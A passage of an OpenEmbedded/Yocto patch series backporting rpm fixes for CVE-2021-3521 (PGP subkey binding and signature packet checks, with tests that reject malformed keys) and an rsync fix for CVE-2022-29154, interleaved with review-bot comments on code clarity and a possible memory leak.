++ rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
+ } break;
+ case 4:
+ { pgpPktSigV4 v = (pgpPktSigV4)h;
+@@ -658,7 +656,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
+ if (p > (h + hlen))
+ return 1;
+
+- rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
++ rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
+ } break;
+ default:
+ rpmlog(RPMLOG_WARNING, _("Unsupported version of key: V%d\n"), version);
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch
new file mode 100644
index 0000000000..c5f88a8c72
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-02.patch
@@ -0,0 +1,55 @@
+From 9f03f42e2614a68f589f9db8fe76287146522c0c Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:56:20 +0300
+Subject: [PATCH] Refactor pgpDigParams construction to helper function
+
+No functional changes, just to reduce code duplication and needed by
+the following commits.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/9f03f42e2614a68f589f9db8fe76287146522c0c]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 13 +++++++++----
+ 1 file changed, 9 insertions(+), 4 deletions(-)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index 340de5fc9a..aad7c275c9 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1055,6 +1055,13 @@ unsigned int pgpDigParamsAlgo(pgpDigParams digp, unsigned int algotype)
+ return algo;
+ }
+
++static pgpDigParams pgpDigParamsNew(uint8_t tag)
++{
++ pgpDigParams digp = xcalloc(1, sizeof(*digp));
++ digp->tag = tag;
++ return digp;
++}
++
+ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ pgpDigParams * ret)
+ {
+@@ -1072,8 +1079,7 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ if (pkttype && pkt.tag != pkttype) {
+ break;
+ } else {
+- digp = xcalloc(1, sizeof(*digp));
+- digp->tag = pkt.tag;
++ digp = pgpDigParamsNew(pkt.tag);
+ }
+ }
+
+@@ -1121,8 +1127,7 @@ int pgpPrtParamsSubkeys(const uint8_t *pkts, size_t pktlen,
+ digps = xrealloc(digps, alloced * sizeof(*digps));
+ }
+
+- digps[count] = xcalloc(1, sizeof(**digps));
+- digps[count]->tag = PGPTAG_PUBLIC_SUBKEY;
++ digps[count] = pgpDigParamsNew(PGPTAG_PUBLIC_SUBKEY);
+ /* Copy UID from main key to subkey */
+ digps[count]->userid = xstrdup(mainkey->userid);
+
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch
new file mode 100644
index 0000000000..fd31f11beb
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-03.patch
@@ -0,0 +1,34 @@
+From 5ff86764b17f31535cb247543a90dd739076ec38 Mon Sep 17 00:00:00 2001
+From: Demi Marie Obenour <demi@invisiblethingslab.com>
+Date: Thu, 6 May 2021 18:34:45 -0400
+Subject: [PATCH] Do not allow extra packets to follow a signature
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+According to RFC 4880 § 11.4, a detached signature is “simply a
+Signature packetâ€. Therefore, extra packets following a detached
+signature are not allowed.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/5ff86764b17f31535cb247543a90dd739076ec38]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index f1a99e7169..5b346a8253 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1068,6 +1068,8 @@ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ break;
+
+ p += (pkt.body - pkt.head) + pkt.blen;
++ if (pkttype == PGPTAG_SIGNATURE)
++ break;
+ }
+
+ rc = (digp && (p == pend)) ? 0 : -1;
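Review bot: The added `if (pkttype == PGPTAG_SIGNATURE) break;` in pgpPrtParams carries no comment, and the break alone does not reject trailing packets; that is done by the `p == pend` test in the `rc` assignment after the loop. A reader who later relaxes that test would silently re-admit extra packets after a detached signature. I would add `/* a detached signature is a single packet; anything left over fails the p == pend check below */` above the break. The loop header and the rest of the function are outside the hunk.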
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch
new file mode 100644
index 0000000000..cb9e9842fe
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521.patch
@@ -0,0 +1,330 @@
+From bd36c5dc9fb6d90c46fbfed8c2d67516fc571ec8 Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:59:30 +0300
+Subject: [PATCH] Validate and require subkey binding signatures on PGP public
+ keys
+
+All subkeys must be followed by a binding signature by the primary key
+as per the OpenPGP RFC, enforce the presence and validity in the parser.
+
+The implementation is as kludgey as they come to work around our
+simple-minded parser structure without touching API, to maximise
+backportability. Store all the raw packets internally as we decode them
+to be able to access previous elements at will, needed to validate ordering
+and access the actual data. Add testcases for manipulated keys whose
+import previously would succeed.
+
+Depends on the two previous commits:
+7b399fcb8f52566e6f3b4327197a85facd08db91 and
+236b802a4aa48711823a191d1b7f753c82a89ec5
+
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/bd36c5dc9fb6d90c46fbfed8c2d67516fc571ec8]
+Comment: Hunk refreshed
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+Fixes CVE-2021-3521.
+---
+ rpmio/rpmpgp.c | 98 +++++++++++++++++--
+ tests/Makefile.am | 3 +
+ tests/data/keys/CVE-2021-3521-badbind.asc | 25 +++++
+ .../data/keys/CVE-2021-3521-nosubsig-last.asc | 25 +++++
+ tests/data/keys/CVE-2021-3521-nosubsig.asc | 37 +++++++
+ tests/rpmsigdig.at | 28 ++++++
+ 6 files changed, 209 insertions(+), 7 deletions(-)
+ create mode 100644 tests/data/keys/CVE-2021-3521-badbind.asc
+ create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+ create mode 100644 tests/data/keys/CVE-2021-3521-nosubsig.asc
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index aad7c275c9..d70802ae86 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -1004,37 +1004,121 @@ static pgpDigParams pgpDigParamsNew(uint8_t tag)
+ return digp;
+ }
+
++static int hashKey(DIGEST_CTX hash, const struct pgpPkt *pkt, int exptag)
++{
++ int rc = -1;
++ if (pkt->tag == exptag) {
++ uint8_t head[] = {
++ 0x99,
++ (pkt->blen >> 8),
++ (pkt->blen ),
++ };
++
++ rpmDigestUpdate(hash, head, 3);
++ rpmDigestUpdate(hash, pkt->body, pkt->blen);
++ rc = 0;
++ }
++ return rc;
++}
++
++static int pgpVerifySelf(pgpDigParams key, pgpDigParams selfsig,
++ const struct pgpPkt *all, int i)
++{
++ int rc = -1;
++ DIGEST_CTX hash = NULL;
++
++ switch (selfsig->sigtype) {
++ case PGPSIGTYPE_SUBKEY_BINDING:
++ hash = rpmDigestInit(selfsig->hash_algo, 0);
++ if (hash) {
++ rc = hashKey(hash, &all[0], PGPTAG_PUBLIC_KEY);
++ if (!rc)
++ rc = hashKey(hash, &all[i-1], PGPTAG_PUBLIC_SUBKEY);
++ }
++ break;
++ default:
++ /* ignore types we can't handle */
++ rc = 0;
++ break;
++ }
++
++ if (hash && rc == 0)
++ rc = pgpVerifySignature(key, selfsig, hash);
++
++ rpmDigestFinal(hash, NULL, NULL, 0);
++
++ return rc;
++}
++
+ int pgpPrtParams(const uint8_t * pkts, size_t pktlen, unsigned int pkttype,
+ pgpDigParams * ret)
+ {
+ const uint8_t *p = pkts;
+ const uint8_t *pend = pkts + pktlen;
+ pgpDigParams digp = NULL;
+- struct pgpPkt pkt;
++ pgpDigParams selfsig = NULL;
++ int i = 0;
++ int alloced = 16; /* plenty for normal cases */
++ struct pgpPkt *all = xmalloc(alloced * sizeof(*all));
+ int rc = -1; /* assume failure */
++ int expect = 0;
++ int prevtag = 0;
+
+ while (p < pend) {
+- if (decodePkt(p, (pend - p), &pkt))
++ struct pgpPkt *pkt = &all[i];
++ if (decodePkt(p, (pend - p), pkt))
+ break;
+
+ if (digp == NULL) {
+- if (pkttype && pkt.tag != pkttype) {
++ if (pkttype && pkt->tag != pkttype) {
+ break;
+ } else {
+- digp = pgpDigParamsNew(pkt.tag);
++ digp = pgpDigParamsNew(pkt->tag);
+ }
+ }
+
+- if (pgpPrtPkt(&pkt, digp))
++ if (expect) {
++ if (pkt->tag != expect)
++ break;
++ selfsig = pgpDigParamsNew(pkt->tag);
++ }
++
++ if (pgpPrtPkt(pkt, selfsig ? selfsig : digp))
+ break;
+
+- p += (pkt.body - pkt.head) + pkt.blen;
++ if (selfsig) {
++ /* subkeys must be followed by binding signature */
++ if (prevtag == PGPTAG_PUBLIC_SUBKEY) {
++ if (selfsig->sigtype != PGPSIGTYPE_SUBKEY_BINDING)
++ break;
++ }
++
++ int xx = pgpVerifySelf(digp, selfsig, all, i);
++
++ selfsig = pgpDigParamsFree(selfsig);
++ if (xx)
++ break;
++ expect = 0;
++ }
++
++ if (pkt->tag == PGPTAG_PUBLIC_SUBKEY)
++ expect = PGPTAG_SIGNATURE;
++ prevtag = pkt->tag;
++
++ i++;
++ p += (pkt->body - pkt->head) + pkt->blen;
+ if (pkttype == PGPTAG_SIGNATURE)
+ break;
++
++ if (alloced <= i) {
++ alloced *= 2;
++ all = xrealloc(all, alloced * sizeof(*all));
++ }
+ }
+
+- rc = (digp && (p == pend)) ? 0 : -1;
++ rc = (digp && (p == pend) && expect == 0) ? 0 : -1;
+
++ free(all);
+ if (ret && rc == 0) {
+ *ret = digp;
+ } else {
+diff --git a/tests/Makefile.am b/tests/Makefile.am
+index b4a2e2e1ce..bc535d2833 100644
+--- a/tests/Makefile.am
++++ b/tests/Makefile.am
+@@ -87,6 +87,9 @@ EXTRA_DIST += data/SPECS/hello-config-buildid.spec
+ EXTRA_DIST += data/SPECS/hello-cd.spec
+ EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.pub
+ EXTRA_DIST += data/keys/rpm.org-rsa-2048-test.secret
++EXTRA_DIST += data/keys/CVE-2021-3521-badbind.asc
++EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig.asc
++EXTRA_DIST += data/keys/CVE-2021-3521-nosubsig-last.asc
+ EXTRA_DIST += data/macros.testfile
+
+ # testsuite voodoo
+diff --git a/tests/data/keys/CVE-2021-3521-badbind.asc b/tests/data/keys/CVE-2021-3521-badbind.asc
+new file mode 100644
+index 0000000000..aea00f9d7a
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-badbind.asc
+@@ -0,0 +1,25 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++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++=WCfs
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/data/keys/CVE-2021-3521-nosubsig-last.asc b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+new file mode 100644
+index 0000000000..aea00f9d7a
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-nosubsig-last.asc
+@@ -0,0 +1,25 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++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++=WCfs
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/data/keys/CVE-2021-3521-nosubsig.asc b/tests/data/keys/CVE-2021-3521-nosubsig.asc
+new file mode 100644
+index 0000000000..3a2e7417f8
+--- /dev/null
++++ b/tests/data/keys/CVE-2021-3521-nosubsig.asc
+@@ -0,0 +1,37 @@
++-----BEGIN PGP PUBLIC KEY BLOCK-----
++Version: rpm-4.17.90 (NSS-3)
++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++=rRop
++-----END PGP PUBLIC KEY BLOCK-----
++
+diff --git a/tests/rpmsigdig.at b/tests/rpmsigdig.at
+index 0f8f2b4884..c8b9f139e1 100644
+--- a/tests/rpmsigdig.at
++++ b/tests/rpmsigdig.at
+@@ -240,6 +240,34 @@ gpg(185e6146f00650f8) = 4:185e6146f00650f8-58e63918
+ [])
+ AT_CLEANUP
+
++AT_SETUP([rpmkeys --import invalid keys])
++AT_KEYWORDS([rpmkeys import])
++RPMDB_INIT
++
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-badbind.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-badbind.asc: key 1 import failed.]
++)
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-nosubsig.asc: key 1 import failed.]
++)
++
++AT_CHECK([
++runroot rpmkeys --import /data/keys/CVE-2021-3521-nosubsig-last.asc
++],
++[1],
++[],
++[error: /data/keys/CVE-2021-3521-nosubsig-last.asc: key 1 import failed.]
++)
++AT_CLEANUP
++
+ # ------------------------------
+ # Test pre-built package verification
+ AT_SETUP([rpmkeys -K <signed> 1])
+
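Review bot: In the rewritten pgpPrtParams loop, `selfsig` is allocated by `pgpDigParamsNew(pkt->tag)`, but two later exits leave the loop without releasing it: the `pgpPrtPkt(pkt, selfsig ? selfsig : digp)` failure and the `selfsig->sigtype != PGPSIGTYPE_SUBKEY_BINDING` check. The cleanup visible after the loop frees `all` and handles `digp` only, so each rejected key that takes one of those paths appears to leak one pgpDigParams, and this parser runs on key material supplied from outside. Adding `selfsig = pgpDigParamsFree(selfsig);` next to `free(all);` would cover every exit, assuming pgpDigParamsFree accepts NULL (not visible here). The tail of the function is outside the hunk, so check that it does not already do this.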
diff --git a/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb b/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
index 4029217d08..4d605c8501 100644
--- a/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
+++ b/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb
@@ -24,7 +24,7 @@ HOMEPAGE = "http://www.rpm.org"
LICENSE = "GPL-2.0"
LIC_FILES_CHKSUM = "file://COPYING;md5=c0bf017c0fd1920e6158a333acabfd4a"
-SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \
+SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x;protocol=https \
file://0001-Do-not-add-an-unsatisfiable-dependency-when-building.patch \
file://0001-Do-not-read-config-files-from-HOME.patch \
file://0001-When-cross-installing-execute-package-scriptlets-wit.patch \
@@ -44,6 +44,13 @@ SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \
file://0001-mono-find-provides-requires-do-not-use-monodis-from-.patch \
file://0001-Rip-out-partial-support-for-unused-MD2-and-RIPEMD160.patch \
file://0001-rpmplugins.c-call-dlerror-prior-to-dlsym.patch \
+ file://0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch \
+ file://CVE-2021-3421.patch \
+ file://CVE-2021-20266.patch \
+ file://CVE-2021-3521-01.patch \
+ file://CVE-2021-3521-02.patch \
+ file://CVE-2021-3521-03.patch \
+ file://CVE-2021-3521.patch \
"
PE = "1"
@@ -60,7 +67,8 @@ export PYTHON_ABI
# OE-core patches autoreconf to additionally run gnu-configize, which fails with this recipe
EXTRA_AUTORECONF_append = " --exclude=gnu-configize"
-EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl"
+# Vendor is detected differently on x86 and aarch64 hosts and can feed into target packages
+EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl --with-vendor=pc"
EXTRA_OECONF_append_libc-musl = " --disable-nls"
# --sysconfdir prevents rpm from attempting to access machine-specific configuration in sysroot/etc; we need to have it in rootfs
diff --git a/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch b/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch
new file mode 100644
index 0000000000..b2e02dba97
--- /dev/null
+++ b/meta/recipes-devtools/rsync/files/0001-Fix-relative-when-copying-an-absolute-path.patch
@@ -0,0 +1,31 @@
+From fabef23bea6e9963c06e218586fda1a823e3c6bf Mon Sep 17 00:00:00 2001
+From: Wayne Davison <wayne@opencoder.net>
+Date: Mon, 8 Aug 2022 21:30:21 -0700
+Subject: [PATCH] Fix --relative when copying an absolute path.
+
+CVE: CVE-2022-29154
+Upstream-Status: Backport [https://github.com/WayneD/rsync/commit/fabef23bea6e9963c06e218586fda1a823e3c6bf]
+Signed-off-by: Matthias Schmitz <matthias.schmitz@port4949.net>
+---
+ exclude.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/exclude.c b/exclude.c
+index 2394023f..ba5ca5a3 100644
+--- a/exclude.c
++++ b/exclude.c
+@@ -434,8 +434,10 @@ void add_implied_include(const char *arg)
+ *p++ = *cp++;
+ break;
+ case '/':
+- if (p[-1] == '/') /* This is safe because of the initial slash. */
++ if (p[-1] == '/') { /* This is safe because of the initial slash. */
++ cp++;
+ break;
++ }
+ if (relative_paths) {
+ filter_rule const *ent;
+ int found = 0;
+--
+2.39.2
+
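Review bot: The existing comment on the `if (p[-1] == '/')` line in add_implied_include explains only why reading `p[-1]` is safe, not why the new `cp++` is needed. From the hunk, `cp` is the source cursor and `p` the output cursor, so the added increment appears to consume the repeated slash rather than leave it in the input. A short comment on that line, such as `/* drop the duplicate '/' from the input */`, would make this clear. The surrounding loop and switch start outside the hunk, so confirm the wording against them.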
diff --git a/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch b/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch
new file mode 100644
index 0000000000..61e4e03254
--- /dev/null
+++ b/meta/recipes-devtools/rsync/files/CVE-2022-29154.patch
@@ -0,0 +1,334 @@
+From b7231c7d02cfb65d291af74ff66e7d8c507ee871 Mon Sep 17 00:00:00 2001
+From: Wayne Davison <wayne@opencoder.net>
+Date: Sun, 31 Jul 2022 16:55:34 -0700
+Subject: [PATCH] Some extra file-list safety checks.
+
+CVE-2022-29154 rsync: remote arbitrary files write inside the
+
+Upstream-Status: Backport from [https://git.samba.org/?p=rsync.git;a=patch;h=b7231c7d02cfb65d291af74ff66e7d8c507ee871]
+CVE:CVE-2022-29154
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ exclude.c | 127 ++++++++++++++++++++++++++++++++++++++++++++++++++++-
+ flist.c | 17 ++++++-
+ io.c | 4 ++
+ main.c | 7 ++-
+ receiver.c | 11 +++--
+ 5 files changed, 158 insertions(+), 8 deletions(-)
+
+diff --git a/exclude.c b/exclude.c
+index 7989fb3..e146e96 100644
+--- a/exclude.c
++++ b/exclude.c
+@@ -26,16 +26,21 @@ extern int am_server;
+ extern int am_sender;
+ extern int eol_nulls;
+ extern int io_error;
++extern int xfer_dirs;
++extern int recurse;
+ extern int local_server;
+ extern int prune_empty_dirs;
+ extern int ignore_perishable;
++extern int relative_paths;
+ extern int delete_mode;
+ extern int delete_excluded;
+ extern int cvs_exclude;
+ extern int sanitize_paths;
+ extern int protocol_version;
++extern int list_only;
+ extern int module_id;
+
++extern char *filesfrom_host;
+ extern char curr_dir[MAXPATHLEN];
+ extern unsigned int curr_dir_len;
+ extern unsigned int module_dirlen;
+@@ -43,8 +48,10 @@ extern unsigned int module_dirlen;
+ filter_rule_list filter_list = { .debug_type = "" };
+ filter_rule_list cvs_filter_list = { .debug_type = " [global CVS]" };
+ filter_rule_list daemon_filter_list = { .debug_type = " [daemon]" };
++filter_rule_list implied_filter_list = { .debug_type = " [implied]" };
+
+ int saw_xattr_filter = 0;
++int trust_sender_filter = 0;
+
+ /* Need room enough for ":MODS " prefix plus some room to grow. */
+ #define MAX_RULE_PREFIX (16)
+@@ -293,6 +300,123 @@ static void add_rule(filter_rule_list *listp, const char *pat, unsigned int pat_
+ }
+ }
+
++/* Each arg the client sends to the remote sender turns into an implied include
++ * that the receiver uses to validate the file list from the sender. */
++void add_implied_include(const char *arg)
++{
++ filter_rule *rule;
++ int arg_len, saw_wild = 0, backslash_cnt = 0;
++ int slash_cnt = 1; /* We know we're adding a leading slash. */
++ const char *cp;
++ char *p;
++ if (relative_paths) {
++ cp = strstr(arg, "/./");
++ if (cp)
++ arg = cp+3;
++ } else {
++ if ((cp = strrchr(arg, '/')) != NULL)
++ arg = cp + 1;
++ }
++ arg_len = strlen(arg);
++ if (arg_len) {
++ if (strpbrk(arg, "*[?")) {
++ /* We need to add room to escape backslashes if wildcard chars are present. */
++ cp = arg;
++ while ((cp = strchr(cp, '\\')) != NULL) {
++ arg_len++;
++ cp++;
++ }
++ saw_wild = 1;
++ }
++ arg_len++; /* Leave room for the prefixed slash */
++ rule = new0(filter_rule);
++ if (!implied_filter_list.head)
++ implied_filter_list.head = implied_filter_list.tail = rule;
++ else {
++ rule->next = implied_filter_list.head;
++ implied_filter_list.head = rule;
++ }
++ rule->rflags = FILTRULE_INCLUDE + (saw_wild ? FILTRULE_WILD : 0);
++ p = rule->pattern = new_array(char, arg_len + 1);
++ *p++ = '/';
++ cp = arg;
++ while (*cp) {
++ switch (*cp) {
++ case '\\':
++ backslash_cnt++;
++ if (saw_wild)
++ *p++ = '\\';
++ *p++ = *cp++;
++ break;
++ case '/':
++ if (p[-1] == '/') /* This is safe because of the initial slash. */
++ break;
++ if (relative_paths) {
++ filter_rule const *ent;
++ int found = 0;
++ *p = '\0';
++ for (ent = implied_filter_list.head; ent; ent = ent->next) {
++ if (ent != rule && strcmp(ent->pattern, rule->pattern) == 0)
++ found = 1;
++ }
++ if (!found) {
++ filter_rule *R_rule = new0(filter_rule);
++ R_rule->rflags = FILTRULE_INCLUDE + (saw_wild ? FILTRULE_WILD : 0);
++ R_rule->pattern = strdup(rule->pattern);
++ R_rule->u.slash_cnt = slash_cnt;
++ R_rule->next = implied_filter_list.head;
++ implied_filter_list.head = R_rule;
++ }
++ }
++ slash_cnt++;
++ *p++ = *cp++;
++ break;
++ default:
++ *p++ = *cp++;
++ break;
++ }
++ }
++ *p = '\0';
++ rule->u.slash_cnt = slash_cnt;
++ arg = (const char *)rule->pattern;
++ }
++
++ if (recurse || xfer_dirs) {
++ /* Now create a rule with an added "/" & "**" or "*" at the end */
++ rule = new0(filter_rule);
++ if (recurse)
++ rule->rflags = FILTRULE_INCLUDE | FILTRULE_WILD | FILTRULE_WILD2;
++ else
++ rule->rflags = FILTRULE_INCLUDE | FILTRULE_WILD;
++ /* A +4 in the len leaves enough room for / * * \0 or / * \0 \0 */
++ if (!saw_wild && backslash_cnt) {
++ /* We are appending a wildcard, so now the backslashes need to be escaped. */
++ p = rule->pattern = new_array(char, arg_len + backslash_cnt + 3 + 1);
++ cp = arg;
++ while (*cp) {
++ if (*cp == '\\')
++ *p++ = '\\';
++ *p++ = *cp++;
++ }
++ } else {
++ p = rule->pattern = new_array(char, arg_len + 3 + 1);
++ if (arg_len) {
++ memcpy(p, arg, arg_len);
++ p += arg_len;
++ }
++ }
++ if (p[-1] != '/')
++ *p++ = '/';
++ *p++ = '*';
++ if (recurse)
++ *p++ = '*';
++ *p = '\0';
++ rule->u.slash_cnt = slash_cnt + 1;
++ rule->next = implied_filter_list.head;
++ implied_filter_list.head = rule;
++ }
++}
++
+ /* This frees any non-inherited items, leaving just inherited items on the list. */
+ static void pop_filter_list(filter_rule_list *listp)
+ {
+@@ -721,7 +845,7 @@ static void report_filter_result(enum logcode code, char const *name,
+ : name_flags & NAME_IS_DIR ? "directory"
+ : "file";
+ rprintf(code, "[%s] %sing %s %s because of pattern %s%s%s\n",
+- w, actions[*w!='s'][!(ent->rflags & FILTRULE_INCLUDE)],
++ w, actions[*w=='g'][!(ent->rflags & FILTRULE_INCLUDE)],
+ t, name, ent->pattern,
+ ent->rflags & FILTRULE_DIRECTORY ? "/" : "", type);
+ }
+@@ -894,6 +1018,7 @@ static filter_rule *parse_rule_tok(const char **rulestr_ptr,
+ }
+ switch (ch) {
+ case ':':
++ trust_sender_filter = 1;
+ rule->rflags |= FILTRULE_PERDIR_MERGE
+ | FILTRULE_FINISH_SETUP;
+ /* FALL THROUGH */
+diff --git a/flist.c b/flist.c
+index 499440c..630d685 100644
+--- a/flist.c
++++ b/flist.c
+@@ -70,6 +70,7 @@ extern int need_unsorted_flist;
+ extern int sender_symlink_iconv;
+ extern int output_needs_newline;
+ extern int sender_keeps_checksum;
++extern int trust_sender_filter;
+ extern int unsort_ndx;
+ extern uid_t our_uid;
+ extern struct stats stats;
+@@ -80,8 +81,7 @@ extern char curr_dir[MAXPATHLEN];
+
+ extern struct chmod_mode_struct *chmod_modes;
+
+-extern filter_rule_list filter_list;
+-extern filter_rule_list daemon_filter_list;
++extern filter_rule_list filter_list, implied_filter_list, daemon_filter_list;
+
+ #ifdef ICONV_OPTION
+ extern int filesfrom_convert;
+@@ -904,6 +904,19 @@ static struct file_struct *recv_file_entry(int f, struct file_list *flist, int x
+ exit_cleanup(RERR_UNSUPPORTED);
+ }
+
++ if (*thisname != '.' || thisname[1] != '\0') {
++ int filt_flags = S_ISDIR(mode) ? NAME_IS_DIR : NAME_IS_FILE;
++ if (!trust_sender_filter /* a per-dir filter rule means we must trust the sender's filtering */
++ && filter_list.head && check_filter(&filter_list, FINFO, thisname, filt_flags) < 0) {
++ rprintf(FERROR, "ERROR: rejecting excluded file-list name: %s\n", thisname);
++ exit_cleanup(RERR_PROTOCOL);
++ }
++ if (implied_filter_list.head && check_filter(&implied_filter_list, FINFO, thisname, filt_flags) <= 0) {
++ rprintf(FERROR, "ERROR: rejecting unrequested file-list name: %s\n", thisname);
++ exit_cleanup(RERR_PROTOCOL);
++ }
++ }
++
+ if (inc_recurse && S_ISDIR(mode)) {
+ if (one_file_system) {
+ /* Room to save the dir's device for -x */
+diff --git a/io.c b/io.c
+index c04dbd5..698a7da 100644
+--- a/io.c
++++ b/io.c
+@@ -415,6 +415,7 @@ static void forward_filesfrom_data(void)
+ while (s != eob) {
+ if (*s++ == '\0') {
+ ff_xb.len = s - sob - 1;
++ add_implied_include(sob);
+ if (iconvbufs(ic_send, &ff_xb, &iobuf.out, flags) < 0)
+ exit_cleanup(RERR_PROTOCOL); /* impossible? */
+ write_buf(iobuf.out_fd, s-1, 1); /* Send the '\0'. */
+@@ -446,9 +447,12 @@ static void forward_filesfrom_data(void)
+ char *f = ff_xb.buf + ff_xb.pos;
+ char *t = ff_xb.buf;
+ char *eob = f + len;
++ char *cur = t;
+ /* Eliminate any multi-'\0' runs. */
+ while (f != eob) {
+ if (!(*t++ = *f++)) {
++ add_implied_include(cur);
++ cur = t;
+ while (f != eob && *f == '\0')
+ f++;
+ }
+diff --git a/main.c b/main.c
+index ee9630f..6ec56e7 100644
+--- a/main.c
++++ b/main.c
+@@ -78,6 +78,7 @@ extern BOOL flist_receiving_enabled;
+ extern BOOL shutting_down;
+ extern int backup_dir_len;
+ extern int basis_dir_cnt;
++extern int trust_sender_filter;
+ extern struct stats stats;
+ extern char *stdout_format;
+ extern char *logfile_format;
+@@ -93,7 +94,7 @@ extern char curr_dir[MAXPATHLEN];
+ extern char backup_dir_buf[MAXPATHLEN];
+ extern char *basis_dir[MAX_BASIS_DIRS+1];
+ extern struct file_list *first_flist;
+-extern filter_rule_list daemon_filter_list;
++extern filter_rule_list daemon_filter_list, implied_filter_list;
+
+ uid_t our_uid;
+ gid_t our_gid;
+@@ -534,6 +535,7 @@ static pid_t do_cmd(char *cmd, char *machine, char *user, char **remote_argv, in
+ #ifdef ICONV_CONST
+ setup_iconv();
+ #endif
++ trust_sender_filter = 1;
+ } else if (local_server) {
+ /* If the user didn't request --[no-]whole-file, force
+ * it on, but only if we're not batch processing. */
+@@ -1358,6 +1360,8 @@ static int start_client(int argc, char *argv[])
+ char *dummy_host;
+ int dummy_port = rsync_port;
+ int i;
++ if (filesfrom_fd < 0)
++ add_implied_include(remote_argv[0]);
+ /* For remote source, any extra source args must have either
+ * the same hostname or an empty hostname. */
+ for (i = 1; i < remote_argc; i++) {
+@@ -1381,6 +1385,7 @@ static int start_client(int argc, char *argv[])
+ if (!rsync_port && !*arg) /* Turn an empty arg into a dot dir. */
+ arg = ".";
+ remote_argv[i] = arg;
++ add_implied_include(arg);
+ }
+ }
+
+diff --git a/receiver.c b/receiver.c
+index d6a48f1..c0aa893 100644
+--- a/receiver.c
++++ b/receiver.c
+@@ -577,10 +577,13 @@ int recv_files(int f_in, int f_out, char *local_name)
+ if (DEBUG_GTE(RECV, 1))
+ rprintf(FINFO, "recv_files(%s)\n", fname);
+
+- if (daemon_filter_list.head && (*fname != '.' || fname[1] != '\0')
+- && check_filter(&daemon_filter_list, FLOG, fname, 0) < 0) {
+- rprintf(FERROR, "attempt to hack rsync failed.\n");
+- exit_cleanup(RERR_PROTOCOL);
++ if (daemon_filter_list.head && (*fname != '.' || fname[1] != '\0')) {
